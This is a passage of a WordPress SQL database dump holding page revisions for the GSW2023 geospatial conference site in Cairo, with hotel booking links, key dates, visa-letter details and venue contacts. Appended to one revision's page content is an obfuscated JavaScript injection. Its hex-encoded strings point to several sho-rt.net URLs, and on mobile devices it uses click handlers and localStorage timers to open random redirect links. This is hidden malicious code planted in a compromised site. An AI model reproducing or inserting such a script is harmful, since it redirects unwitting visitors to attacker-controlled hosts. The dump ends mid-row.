link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570411308{margin-top: 130px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-24 01:37:03','2023-06-24 01:37:03','',3066,'https://gsw2023.com/?p=4797',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(4798,1,'2023-06-24 01:37:45','2023-06-24 01:37:45','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: 